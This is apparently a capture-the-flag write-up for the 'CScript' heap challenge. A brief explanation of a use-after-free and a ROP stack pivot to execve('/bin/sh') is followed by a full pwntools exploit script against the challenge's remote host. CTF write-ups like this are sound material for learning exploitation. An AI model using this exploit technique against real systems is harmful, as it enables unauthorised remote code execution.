3rd place

CScript (4 solves)

There is a UAF vulnerability when we assign a value to a variable using + statement. We can achieve an arbitrary code execution in the Print function by exploit the UAF vulnerability. At last, we just need to build our ROP chain and find a gadget that can trigger a stack pivot to execute execve("/bin/sh", 0, 0)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *

io = remote('cscript.wolvctf.io', 1337)
context.bits = 64

ru          = lambda x          : io.recvuntil(x, drop = True)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()

ru('Heap base: ')
heap_base = int(ru('\n'), 16)
sla('>> ', 'a=Store(' + '\"' + 'a' * 0x20 + '\"' + ')')
gadget = 0x00000000004ab607
pop_rax = 0x000000000040af06
pop_rsi = 0x0000000000401786
pop_rdx_rbx = 0x00000000004ac707
syscall = 0x0000000000445a22
rop_chain = flat([
    pop_rax,
    0x3b,
    pop_rsi,
    0,
    pop_rdx_rbx,
    0,
    0,
    syscall
])
sla('>> ', 'a' * 0x20 + rop_chain + 'a' * 0x10 + '/bin/sh' + 'a' * 0x10)
sla('>> ', 'b=Store(6)')
sla('>> ', 'c=a+b')
sla('>> ', 'Release(c)')
sla('>> ', p64(heap_base + 0x13840 - 0x30) + 'a' + p64(heap_base + 0x13890) + p64(0x00000000004ab607) + 'a' * 7 + '=Store(' + '\"' + 'a' * 0x20 +'\"' + ')')
sla('>> ', 'Print(b)')
ia()